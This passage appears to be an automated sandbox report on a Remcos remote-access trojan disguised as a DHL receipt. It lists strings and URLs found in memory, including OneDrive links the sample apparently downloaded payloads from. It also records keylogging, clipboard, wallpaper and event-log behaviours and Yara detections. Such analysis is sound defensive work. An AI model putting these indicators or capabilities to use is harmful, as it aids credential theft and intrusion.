Source: remcos.exe, 00000016.00000002.1820672568.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comr
Source: remcos.exe, 00000016.00000003.1820018363.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000016.00000003.1820090279.00000000007CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.comta
Source: bhvC179.tmp.20.dr String found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696334965379
Source: remcos.exe, 00000014.00000002.1856718053.0000000000193000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net
Source: remcos.exe, 00000016.00000002.1820672568.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net/
Source: DHL119040 receipt document,pdf.exe, DHL119040 receipt document,pdf.exe, 00000000.00000002.1801950205.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1719180719.000000002D4FC000.00000004.00000020.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000002.1734723673.0000000002326000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000002.1735332955.00000000028A0000.00000040.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000002.1764092562.000000002C470000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1719180719.000000002D4A1000.00000004.00000020.00020000.00000000.sdmp, yfkwifxL.pif, yfkwifxL.pif, 00000001.00000001.1712591373.0000000000418000.00000040.00000001.00020000.00000000.sdmp, yfkwifxL.pif, 00000001.00000000.1711928775.0000000000416000.00000002.00000001.01000000.00000005.sdmp, yfkwifxL.pif, 00000001.00000001.1712591373.000000000044B000.00000040.00000001.00020000.00000000.sdmp, yfkwifxL.pif, 00000001.00000002.1876666457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, yfkwifxL.pif.0.dr String found in binary or memory: http://www.pmail.com
Source: bhvC179.tmp.20.dr String found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437
Source: bhvC179.tmp.20.dr String found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d
Source: bhvC179.tmp.20.dr String found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03
Source: bhvC179.tmp.20.dr String found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7
Source: bhvC179.tmp.20.dr String found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5
Source: bhvC179.tmp.20.dr String found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742
Source: bhvC179.tmp.20.dr String found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc
Source: bhvC179.tmp.20.dr String found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d
Source: bhvC179.tmp.20.dr String found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W
Source: bhvC179.tmp.20.dr String found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326
Source: bhvC179.tmp.20.dr String found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68
Source: bhvC179.tmp.20.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: bhvC179.tmp.20.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
Source: bhvC179.tmp.20.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
Source: bhvC179.tmp.20.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: bhvC179.tmp.20.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
Source: xkn.exe, 00000010.00000002.1804930904.00000151BD507000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6
Source: xkn.exe, 00000010.00000002.1804930904.00000151BD529000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: bhvC179.tmp.20.dr String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: bhvC179.tmp.20.dr String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: bhvC179.tmp.20.dr String found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
Source: bhvC179.tmp.20.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
Source: bhvC179.tmp.20.dr String found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
Source: bhvC179.tmp.20.dr String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhvC179.tmp.20.dr String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr
Source: bhvC179.tmp.20.dr String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr
Source: bhvC179.tmp.20.dr String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD
Source: bhvC179.tmp.20.dr String found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?99bdaa7641aea1439604d0afe8971477
Source: bhvC179.tmp.20.dr String found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?bc7d158a1b0c0bcddb88a222b6122bda
Source: bhvC179.tmp.20.dr String found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8
Source: bhvC179.tmp.20.dr String found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c
Source: bhvC179.tmp.20.dr String found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?4be9f57fdbd89d63c136fa90032d1d91
Source: bhvC179.tmp.20.dr String found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?e5772e13592c9d33c9159aed24f891a7
Source: bhvC179.tmp.20.dr String found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?a6aceac28fb5ae421a73cab7cdd76bd8
Source: bhvC179.tmp.20.dr String found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?b57fe5cd49060a950d25a1d237496815
Source: bhvC179.tmp.20.dr String found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?2f6c563d6db8702d4f61cfc28e14d6ba
Source: bhvC179.tmp.20.dr String found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?3dacce210479f0b4d47ed33c21160712
Source: bhvC179.tmp.20.dr String found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?7e0e9c3a9f02f17275e789accf11532b
Source: bhvC179.tmp.20.dr String found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?81f59f7d566abbd2077a5b6cdfd04c7b
Source: bhvC179.tmp.20.dr String found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?3c5bdbf226e2549812723f51b8fe2023
Source: bhvC179.tmp.20.dr String found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?c50299ad5b45bb3d4c7a57024998a291
Source: bhvC179.tmp.20.dr String found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1722944683.00000000007A0000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000003.2495195911.0000000000608000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000002.4124047800.0000000000614000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000029.00000002.1940219819.000000000078F000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000002C.00000002.2020797857.000000000081C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://live.com/
Source: bhvC179.tmp.20.dr String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: bhvC179.tmp.20.dr String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: bhvC179.tmp.20.dr String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: remcos.exe, 00000014.00000003.1855309456.000000000070D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=0000
Source: bhvC179.tmp.20.dr String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3
Source: bhvC179.tmp.20.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae
Source: remcos.exe String found in binary or memory: https://login.yahoo.com/config/login
Source: bhvC179.tmp.20.dr String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
Source: bhvC179.tmp.20.dr String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_sKiljltKC1Ne_Y3fl1HuHQ2.css
Source: bhvC179.tmp.20.dr String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_BxKM4IRLudkIao5qo
Source: bhvC179.tmp.20.dr String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
Source: bhvC179.tmp.20.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2.js
Source: bhvC179.tmp.20.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
Source: bhvC179.tmp.20.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
Source: bhvC179.tmp.20.dr String found in binary or memory: https://maps.windows.com/windows-app-web-link
Source: bhvC179.tmp.20.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
Source: bhvC179.tmp.20.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=27ff908e89d7b6264fde
Source: bhvC179.tmp.20.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=586ba6
Source: bhvC179.tmp.20.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=7ccb04
Source: bhvC179.tmp.20.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=b1ed69
Source: remcos.exe, 00000029.00000002.1940219819.0000000000718000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000002C.00000002.2020797857.00000000007AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/
Source: remcos.exe, 0000002C.00000002.2022678226.000000000289C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/download?resid=C1498A9AB442E5A6%21120&authkey=
Source: bhvC179.tmp.20.dr String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d
Source: bhvC179.tmp.20.dr String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad
Source: bhvC179.tmp.20.dr String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8
Source: bhvC179.tmp.20.dr String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1722944683.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000002.4125282183.0000000000667000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000003.2495195911.0000000000643000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000002C.00000002.2020797857.00000000007AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ppeppa.db.files.1drv.com/
Source: remcos.exe, 00000029.00000002.1940219819.000000000078F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ppeppa.db.files.1drv.com/D
Source: remcos.exe, 0000002C.00000002.2020797857.000000000081C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ppeppa.db.files.1drv.com/J
Source: remcos.exe, 0000002C.00000002.2020797857.00000000007AA000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000002C.00000002.2020797857.000000000081C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ppeppa.db.files.1drv.com/y4mLgHdonCx5W54HXtDkl0peFnfB2dNJH6LZGfHmHwINzKd8xpfh2xvcRVLcQyvTlU4
Source: remcos.exe, 00000029.00000002.1940219819.000000000078F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ppeppa.db.files.1drv.com/y4mNE6BoTh_GBm8Q4wbnKJ7Li2FLqma7FJ080xsTC4pC8QEGyWnm5znLRCbk_51D0_4
Source: remcos.exe, 00000005.00000003.2495195911.0000000000608000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000002.4124047800.000000000063D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000002.4124047800.0000000000609000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000003.2495195911.0000000000638000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ppeppa.db.files.1drv.com/y4mRG-3oYfzeltQECXYM1j_yAY-QqhbV4uB_5qD604rmUO1bM0WiwTYLkGtnANiSqtd
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1722944683.00000000007BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ppeppa.db.files.1drv.com/y4mnmElJQmfVNfndkI9SZphKQ6LfFP4h6K91h8VzvaKMKPoB-EpIdFAeQYlMk6RM5sx
Source: remcos.exe, 0000002C.00000002.2020797857.000000000081C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ppeppa.db.files.1drv.com/y4myOimuUAmzYYCQg7S5DPHrV2LTkb-aNzDgiFFvLFPMKX5riRJbzax3M8WqO_jLV-z
Source: remcos.exe, 0000002C.00000002.2020797857.000000000081C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ppeppa.db.files.1drv.com:443/y4mLgHdonCx5W54HXtDkl0peFnfB2dNJH6LZGfHmHwINzKd8xpfh2xvcRVLcQyv
Source: remcos.exe, 00000029.00000002.1940219819.000000000078F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ppeppa.db.files.1drv.com:443/y4mNE6BoTh_GBm8Q4wbnKJ7Li2FLqma7FJ080xsTC4pC8QEGyWnm5znLRCbk_51
Source: remcos.exe, 00000005.00000002.4124047800.0000000000647000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000003.2495195911.0000000000643000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ppeppa.db.files.1drv.com:443/y4mRG-3oYfzeltQECXYM1j_yAY-QqhbV4uB_5qD604rmUO1bM0WiwTYLkGtnANi
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1722944683.00000000007BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ppeppa.db.files.1drv.com:443/y4mnmElJQmfVNfndkI9SZphKQ6LfFP4h6K91h8VzvaKMKPoB-EpIdFAeQYlMk6R
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-0debb885be07c402c948.js
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ec3581b6c9e6e9985aa7.chunk.v7.js
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7.js
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.9ba2d4c9e339ba497e10.chunk.v7.js
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-1652fd8b358d589e6ec0.js
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7.j
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.d918c7fc33e22b41b936.chunk.v7.c
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
Source: bhvC179.tmp.20.dr String found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993
Source: bhvC179.tmp.20.dr String found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: bhvC179.tmp.20.dr String found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2
Source: bhvC179.tmp.20.dr String found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59
Source: bhvC179.tmp.20.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: remcos.exe, 00000016.00000002.1820672568.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: remcos.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhvC179.tmp.20.dr String found in binary or memory: https://www.office.com/
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.4:49762 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to register a low level keyboard hook
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA4A2B8 SetWindowsHookExA 0000000D,2DA4A2A4,00000000 0_2_2DA4A2B8
Installs a global keyboard hook
Source: C:\ProgramData\Remcos\remcos.exe Windows user hook set: 0 keyboard low level C:\ProgramData\Remcos\remcos.exe Jump to behavior
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA56940 OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 0_2_2DA56940
Contains functionality to modify clipboard data
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA568C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 0_2_2DA568C1
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 20_2_0040987A
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 20_2_004098E2
Contains functionality to read the clipboard data
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA56940 OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 0_2_2DA56940
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA4A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx, 0_2_2DA4A3E0
Yara detected Keylogger Generic
Source: Yara match File source: Process Memory Space: DHL119040 receipt document,pdf.exe PID: 7380, type: MEMORYSTR

E-Banking Fraud
barindex
Yara detected Remcos RAT
Source: Yara match File source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1798684508.000000007E830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000002.2020797857.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1722944683.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.2494576030.0000000000680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.1940219819.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: DHL119040 receipt document,pdf.exe PID: 7380, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: remcos.exe PID: 7596, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: remcos.exe PID: 8132, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: remcos.exe PID: 3844, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\trhrth\logs.dat, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands
barindex
Contains functionalty to change the wallpaper
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA5C9E2 SystemParametersInfoW, 0_2_2DA5C9E2
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5BC9E2 SystemParametersInfoW, 5_2_2D5BC9E2
Reads the Security eventlog
Source: C:\Users\Public\xkn.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\Public\xkn.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\Public\xkn.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\Public\xkn.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Reads the System eventlog
